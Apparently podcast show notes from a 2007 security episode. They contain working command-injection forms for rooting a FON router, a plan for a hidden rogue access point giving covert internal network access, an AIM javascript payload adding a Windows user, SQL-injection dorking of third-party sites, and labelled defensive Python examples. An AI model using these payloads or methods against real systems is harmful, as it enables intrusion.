Episode84

From Paul's Security Weekly
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Episode Media

mp3

Hacking the FON router and hiding it as a rogue

A little about the FON routers

These routers are supplied by LaFonera, and are intended to be used as a WiFi hotspot for the FON network. Add your device, sign up, and use the FON network wherever you go as a member of the FON community. These devices come in two models: the FON (old) and the FON+ (new).

The FON has one ethernet port and wireless. The FON+ has two ethernet ports and wireless (as well as some un-populated USB features!). The FON is tiny, and the FON+ is still small, but much bigger by comparison. Both devices use an Atheros wireless chipset. The Atheros chipset is a favorite of wireless enthusiasts due to its relatively open nature and open drivers, which means that all the coolest wireless tools work with it.

Why hack the FON

Because we can!

No, seriously, we can repurpose this device to do things that it was not intended for, such as many of the projects in our book, Linksys WRT54G Ultimate Hacking. Just the other day - on hackaday no less - I came across a hack for turning a FON into a streaming mp3 player...but for our aims, we can hack one for wireless testing, possibly as a jump point for testing tools, or even place the tools on the device itself. We'll get to a possible use for an attacker soon.

Hacking the FON

Keep in mind in this section we will be dealing with the older FON (not the FON+). At this time, there are no released hacks to add third party firmware on the FON+ (but stay tuned). Some of this stuff will be at a high level, but the detailed steps were graciously created by one of our podcast listeners (and updated by even more): The detailed instructions can be found here: http://www.mcgrewsecurity.com/blog/?p=28

So here are our steps:

  • Power on our FON, not connected to the internet, and associate to the default wireless of "Myplace" using the device serial number as a WPA key.
  • Once connected we need to verify the version of software on the FON. This is displayed on the main web interface screen - this method only works on 0.7.1-r1 of the FON firmware. There are ways to revert versions.
  • Once we have determined the version, we need to send some special form input to the /cgi-bin/webif/connection.sh script on the device, which apparently does not properly sanitize input and will run the supplied input as a system command. We need to submit two items via the form, so create two local pages that we can open with our browser (no web server needed!). Here is the first, which sets the iptables rules to allow SSH to the device:
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</center>
</body>
</html>

...and the second that starts the SSH Dropbear Service:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</center>
</body>
</html>
  • Now we should be able to log into the device with SSH. Once we have, we'll want to make sure that we enable SSH to start up after a reboot:
# mv /etc/init.d/dropbear /etc/init.d/S50dropbear

We also need to un-comment the two lines in /etc/firewall.user so that we can continue to connect to SSH on port 22.

  • In order to be able to load our own custom firmware, OpenWrt Kamikaze, we need to add a custom kernel and RedBoot config to the device. RedBoot is the "BIOS", much like the CFE on Linksys devices. Unlike Linksys devices, RedBoot does not enable networking during boot by default. In order to replace the kernel and RedBoot config, we copy the files to the device from a *nix host connected to the FON, and then write them to flash on the FON:
$ scp openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma admin@192.168.10.1:/tmp/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma

Then we can write the kernel and reboot:

# mtd -e vmlinux.bin.l7 write /tmp/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7
# reboot

And now, the new Redboot config:

$ scp out.hex admin@192.168.10.1:/tmp/out.hex
# mtd -e "RedBoot config" write /tmp/out.hex "RedBoot config"
# reboot
  • Now that we have enabled networking in RedBoot, it will listen on port 9000 for about 10 seconds after booting. In those 10 seconds we need to telnet to the port and issue a CTRL-C, which will give us a RedBoot prompt.
  • Loading the new image requires two files (openwrt-atheros-2.6-vmlinux.lzma and openwrt-atheros-2.6-root.jffs2-64k, both available from the OpenWrt website) to be placed in the root of a web server on the attached computer, so that RedBoot can download them.
  • First we need to define some networking for our RedBoot installation
RedBoot> ip_address -l 192.168.1.254/24 -h 192.168.1.5

Then, we can format the flash, download and write the files from the web server:

RedBoot> fis init
RedBoot> load -r -v -b 0x80040450 /openwrt-atheros-2.6-root.jffs2-64k -m HTTP

RedBoot> fis create -b 0x80040450 -f 0xA8030000 -l 0x006F0000 -e 0x00000000 rootfs
RedBoot> load -r -v -b %{FREEMEMLO} /openwrt-atheros-2.6-vmlinux.lzma -m HTTP
RedBoot> fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7
RedBoot> fis load -l vmlinux.bin.l7
RedBoot> exec
  • The last exec command should cause the FON to reboot, after which we will have a standard installation of OpenWrt.
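The whole procedure above hinges on one flaw class: a CGI shell script that splices a form field into a command line, so a value of the form $(...) is expanded by the shell before the intended command ever runs. The following Python is an added example written for these notes, not code from the page or from the FON firmware; the function names are mine, and `echo` stands in for the real command so that the vulnerable path can be exercised harmlessly next to the hardened one.

```python
import re
import subprocess

# Allowlist for a field that will reach a system command: letters, digits,
# dot, dash and underscore only, 1-32 characters. No shell metacharacters,
# so $(...), backticks, ; and | can never get through.
_USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def is_safe_username(value: str) -> bool:
    """Return True only for values that match the allowlist."""
    return bool(_USERNAME_RE.fullmatch(value))


def handle_vulnerable(username: str) -> str:
    """Mimics the flawed pattern: the field is pasted into a shell command string.

    shell=True hands the string to /bin/sh, which performs command substitution
    on $(...) before running echo. (Constructed demo: echo replaces the real
    command the CGI script would run.)
    """
    cmd = f'echo "Connecting as {username}"'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def handle_hardened(username: str) -> str:
    """Validate first, then pass the value as a discrete argument with no shell."""
    if not is_safe_username(username):
        raise ValueError("rejected form input")
    result = subprocess.run(
        ["echo", "Connecting as", username], capture_output=True, text=True
    )
    return result.stdout.strip()


if __name__ == "__main__":
    # Harmless substitution shows the flaw; the same value is refused when validated.
    print(handle_vulnerable("$(echo INJECTED)"))
    try:
        handle_hardened("$(echo INJECTED)")
    except ValueError as exc:
        print("hardened handler:", exc)
```

The two handlers differ in exactly the way the page's exploit depends on: the first lets the shell interpret the value, the second never invokes a shell and rejects anything outside the allowlist before the argument list is built.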

Why the hack?

This past August at DEFCON 15 I gave a presentation at The WiFi village on some creative places to hide Rogue Access points, specifically looking at the FON devices because of their small size - making them hide-able in all sorts of places.

I'm continuing to update that presentation with additional places to hide those APs. The latest attempt has been in a single gang electrical box equipped with a 3COM 3CNJ200 Switch-in-a-wall-Jack. This model is a 4 port 10/100 switch with a single uplink port; there are older versions that are hubs. I picked mine up on eBay for about $3. This neat piece of hardware also has the ability to host two other ports, directly to a cable.

The 3COM switch can either be powered by a 48V power brick, or via power over ethernet - I can use "parasitic power" from either method of delivery.

I can attach the ethernet port of the FON, to one of the wired ports on the front of the switch, and then use a patch cable to one of the ports in the switch. However this may look a little suspicious, and the intent is to remain hidden.

Enter the soldering iron! I can remove the ethernet connector from the FON, attach a CAT-5 cable directly to the board, and attach the opposite end on the back side of the switch board, keeping all of the cabling internal. Sure, this will effectively disable one of the ports in the switch, but the benefits certainly outweigh that. Now for all of you old school networking guys, here is a chance to win a Starbucks gift card: What is one of the two accepted minimum lengths of UTP cable between devices? There are two possibilities here, because no one can seem to agree on which is valid. Either way, both values could cause a problem with this installation...

Now with my hidden AP, I can use OpenWrt to sniff wireless, sniff network traffic (using arp poisoning/spoofing), or set up a cron job to enable the wireless with a configuration that I specify at, say, 2AM, where I can connect and have access directly to your internal network on a device I control.
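The ARP poisoning the paragraph above mentions leaves a signature a defender can watch for on the wired side: an IP address whose MAC changes mid-session, and one MAC that starts answering for several IPs at once. The following Python is an added example written for these notes, not code from the page; the ARP reply records (timestamps, IPs and MACs) are constructed, and the function names are mine.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen on the LAN: (time, sender_ip, sender_mac).
# The first three are normal; the last two show one new MAC claiming both the
# gateway and a host, which is the shape of a man-in-the-middle.
SAMPLE_ARP_REPLIES = [
    ("02:00:01", "192.168.1.1", "00:11:22:33:44:01"),
    ("02:00:02", "192.168.1.20", "00:11:22:33:44:20"),
    ("02:00:05", "192.168.1.1", "00:11:22:33:44:01"),
    ("02:00:09", "192.168.1.1", "00:AA:BB:CC:DD:EE"),
    ("02:00:10", "192.168.1.20", "00:AA:BB:CC:DD:EE"),
]


def detect_arp_spoofing(replies, baseline=None):
    """Return alert strings for IP->MAC changes and for MACs claiming several IPs.

    baseline: optional dict of known-good ip -> mac pairs (e.g. the gateway),
    so that the very first reply for a known host is also checked.
    """
    ip_to_mac = {ip: mac.lower() for ip, mac in (baseline or {}).items()}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"{ts} {ip} changed from {previous} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        # A MAC answering for more than one IP is legitimate for a router with
        # virtual IPs, so this is a lower-confidence signal than the change above.
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"{ts} {mac} now answers for {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_ARP_REPLIES, {"192.168.1.1": "00:11:22:33:44:01"}):
        print("ALERT", line)
```

In practice the input would come from a sniffer on a span port or from periodic `arp -a` snapshots; the logic is the same, and the baseline dict is where the known gateway MAC belongs.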

HACKER TRIVIA: What is dropbear?

Stories For Discussion

"Message Theft" Vulnerability in Gmail - [PaulDotCom] - How timely! It has been reported that Gmail has a CSRF vulnerability. Sweet! Successful execution means that an attacker can create mail filters, and do things like forward all messages to an attackers email account.

HACKER TRIVIA: Does SSL protect you from this exploit?

Banner CSRF Vulnerabilities - [PaulDotCom] - While we are on the topic, I wanted to mention that the Banner vulnerabilities are now public. Yes, there was a reason that we were covering it on the show, so if you are a university, you need to pay attention to this one. The "workaround" is just that, something an attacker can work around given enough time.

HACKER TRIVIA: Name one way in which you can defeat the referral checking?

Core Releases Several Vulnerabilities for AOL's AIM client - [PaulDotCom] - There are several attack vectors that allow for things such as CSRF via the AIM client (without the use of a browser), injecting Javascript, and attacking the IE engine by sending attacks via AIM. All sorts of fun! Some scary things: it appears that some/most of the vulnerabilities are not patched (http://www.securityfocus.com/brief/596?ref=rss), as researchers warned AOL that the beta versions do not fix the problem because they rely on blocking tags, rather than addressing the problem directly. JUST IN: A real patch is supposed to be released mid-October. Also, if you are doing HTML filtering anywhere, it will not get picked up because these attacks are traveling over the IM protocol. So, here is an example attack:

<img src="javascript:var oShell = new ActiveXObject('Shell.Application');oShell.ShellExecute('cmd.exe', '/c pause');">

This is a pen tester's/attacker's dream come true! All you need to do is send an IM to the client, get them to render that code, and you can execute arbitrary commands! (Even better: 'net user youarepwned mysecretpassword /add')

HACKER TRIVIA: What does the "/c" command line option do when passed to "cmd.exe"?
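The AIM example above works because a javascript: URL in an img src is rendered by the embedded IE engine, and because the message never passes an HTML filter. A client or gateway that does filter IM bodies should use an allowlist: keep text, keep img only with an http(s) src, and drop every other tag and attribute. The following Python is an added example written for these notes, not AIM or Core code; the sanitizer class and function names are mine, and the sample message is the page's own img tag reused as a test input.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Browsers ignore control characters and whitespace inside a scheme ("java\tscript:"),
# so strip them before deciding what the scheme is.
_CTRL_OR_WS = re.compile(r"[\x00-\x20]")


def is_safe_src(url: str) -> bool:
    """Accept only absolute http(s) URLs; everything else (javascript:, data:, //host) is refused."""
    cleaned = _CTRL_OR_WS.sub("", url)
    return urlsplit(cleaned).scheme.lower() in ALLOWED_SCHEMES


class MessageSanitizer(HTMLParser):
    """Allowlist sanitizer for an IM body: text plus <img src=http(s)> only."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self.dropped = 0  # count of start tags removed, useful for alerting

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src") or ""
            if is_safe_src(src):
                # Re-emit with only the one attribute we vetted; nothing else survives.
                self.parts.append(f'<img src="{html.escape(src, quote=True)}">')
                return
        self.dropped += 1

    def handle_data(self, data):
        self.parts.append(html.escape(data))


def sanitize_message(body: str):
    """Return (clean_html, dropped_tag_count) for one message body."""
    parser = MessageSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.parts), parser.dropped


if __name__ == "__main__":
    hostile = ('<img src="javascript:var oShell = new ActiveXObject(\'Shell.Application\');'
               'oShell.ShellExecute(\'cmd.exe\', \'/c pause\');">')
    print(sanitize_message(hostile))
    print(sanitize_message('hi <img src="http://example.test/a.png"> <b>there</b>'))
```

Because the output is rebuilt from scratch rather than edited in place, anything the parser did not explicitly approve simply never reaches the rendering engine.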

Secure RFID? - [Larry] - One of the challenges with properly securing RFID is the lack of true randomness. With an RFID chip, the area for actual "code" is quite small, which also makes it difficult to include a random number generator. These researchers from the University of Massachusetts have found a way to use the memory properties of the chip at power up to obtain randomness - from the binary state due to latent electrical charges. Due to the manufacturing process, there is enough randomness in the way the latent charges propagate. There is even some possibility that this method can also be used to provide another unique identifier for each chip - effectively defeating cloned chips. Sounds like a lot of work to me, for something that should not be used as a single method of authentication, but used as part of a multi-factor authentication scheme.

HACKER TRIVIA: Where is Larry's RFID implant physically located on his body?

Finding SQL Injection is fun and easy - [PaulDotCom] - I like to review the SQL injection vulnerabilities coming out each week and challenge myself to find a vulnerable web site. This is a useful task to perform, as the first place I check for vulnerabilities is the sites that I am being paid to protect. This is a good example: a Mexican web application called "Novus" is vulnerable to SQL injection. A quick Google search for "Powered By Novus", and a "'" in place of the appropriate field in the web application, and we can identify the site as vulnerable. I wish this were automated...

HACKER TRIVIA: In SQL code, what does the double dash "--" do?

BONUS: Search for "Powered by ActiveKB" and refer to http://www.milw0rm.com/exploits/4459. "Bob" says he now has many different people's usernames and passwords... If you are using this software, you should patch? maybe? If there is one...
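The probe described above, a lone quote in a field, works because the application glues the field into the SQL text, so the quote becomes part of the statement's grammar and the database throws a syntax error. The fix on the defending side is a bound parameter, which keeps the input as data. The following Python is an added example written for these notes, not code from Novus, ActiveKB or the page; it uses an in-memory SQLite table with constructed rows, and the function names are mine.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a content site's article list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    conn.executemany("INSERT INTO articles (title) VALUES (?)",
                     [("Welcome",), ("Contact us",)])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """String concatenation: the input is spliced into the SQL text itself."""
    sql = "SELECT title FROM articles WHERE title = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    """Bound parameter: the driver sends the input separately from the statement."""
    return [row[0] for row in
            conn.execute("SELECT title FROM articles WHERE title = ?", (term,))]


def quote_probe_errors(conn: sqlite3.Connection, term: str) -> bool:
    """The detection signal from the page: does a quote in the field produce a DB error?"""
    try:
        search_vulnerable(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:", search_vulnerable(db, "Welcome"))
    print("vulnerable, lone quote errors:", quote_probe_errors(db, "'"))
    # The -- comment sequence discards the rest of the statement, which is how
    # a tautology in the field returns every row from the vulnerable query.
    print("vulnerable, tautology:", search_vulnerable(db, "' OR 1=1 --"))
    print("parameterized, same inputs:", search_parameterized(db, "'"),
          search_parameterized(db, "' OR 1=1 --"))
```

The parameterized query treats both hostile strings as literal titles that match nothing, and it never raises, which also removes the error message that made the site identifiable in the first place.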

Unisys and IDS oh my! - [Larry] - In a nutshell, Unisys provided an IDS system to DHS. Allegedly, Unisys didn't configure them properly, or not at all, and then tried to cover it up. So, besides the alleged contractual issues, let's discuss what really went wrong. First off, the IDS systems were allegedly configured in a way that would not allow for real time alerting. You need realtime alerting - and to review the alerts in a timely fashion. Response processes need to be reviewed, so that events, when caught, can be responded to appropriately - DHS employees allegedly discounted the attacks when they were discovered.

HACKER TRIVIA: What color is the beard of the instructor for the SANS intrusion detection track? (Hint: He is very sexy and Brazilian)

Metasploit adds payloads for iPhone - [PaulDotCom] - As if you weren't already pwned enough, HD Moore and the Metasploit team have added 3 new payloads to Metasploit for the iPhone! They are working on some exploits for Safari as well, which I am pretty certain will not take them long. One of the payloads makes the iPhone vibrate, phun :)

HACKER TRIVIA: What kind of processor does the iPhone use?

Adobe Reader = Pwned - [Larry] - "Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!!," wrote Petko Petkov. Ouch! PDFs are everywhere, and this does affect Reader version 8.1 on Windows XP, which to the best of my knowledge is the latest version. I'll bet that we'll see a ton more PDF exploits for several reasons: PDFs are everywhere. The specification for PDF is over 1000 pages (that's a lot of stuff to screw up). So how do we defend? Restrict PDFs via web or e-mail. Use a third party PDF reader. [PaulDotCom] - View a video of the exploit example here on YouTube.

HACKER TRIVIA: Name one alternative to Adobe Reader.

Madwifi to use Open Source HAL - [PaulDotCom] - This is a huge win for all of us. HALs are a PITA: they are the point of contact the operating system interacts with instead of the hardware, and they are proprietary, which means we don't get to see the source code. OpenBSD's openhal has been ported to Linux, so we can be totally free and open, and included in the Linux kernel! This is more reason to use Atheros-based chipset cards for doing wireless pen testing and security research.

HACKER TRIVIA: What is the name of the new version of Madwifi that uses the OpenHAL?

More Remote Command Execution;rm -fr * - [PaulDotCom] - Remote command execution vulnerabilities are fun! It's how we were first able to hack the Linksys WRT54G routers with the so called "ping hack", which allows you to append commands to a dialog box in the web interface. We also used the same kind of vulnerability to hack the La Fonera. These vulnerabilities STILL persist in other products, like this one which exists in an enterprise PBX!

HACKER TRIVIA: When hacking the WRT54G with the ping hack, would you want to turn boot_wait on or off?

Wireless Hacking Tournament in Thailand - [Larry] - Ooooh, this sounds like fun! Josh, where are you? Too bad it is only a few days before Christmas... Either way, I'm wondering if there will be anything new to be disclosed at this contest. I'd bet that's what the "bonus cash prize" is for. It would be interesting to fire off your wireless sniffer during the contest, and see what you can turn up.

HACKER TRIVIA: Who is the author of CoWPatty, the tool used to crack WPA-PSK networks?

Blackberry Attack Surface - [Larry] - Symantec has released this fantastic PDF (egads, I know) on Blackberry attack surfaces (or potential vectors). If you have a BES/Blackberry installation in your environment I suggest that you read this and examine the expected remediating recommendations. Some of the recommendations really cripple the Blackberry - by disabling Bluetooth, 3rd party apps, and yes, e-mail.

HACKER TRIVIA: Why do people love their Blackberries so much? (Most creative answer wins)

New Oracle password algorithm - [Larry] - Those who don't learn from history are doomed to repeat it. In the new version of Oracle 11g, the updated password algorithm was analyzed by the Phenoelit group. The Phenoelit guys seem to indicate that the new algorithm suffers from the same issues that MS encountered with LANMAN/NTLM hashes being stored together.

HACKER TRIVIA:

Other Stories Of Interest

In ur Labz steelin ur Meth - [Larry] - Trading computer equipment for drugs, and leaving Los Alamos National Laboratory possibly containing classified nuclear information.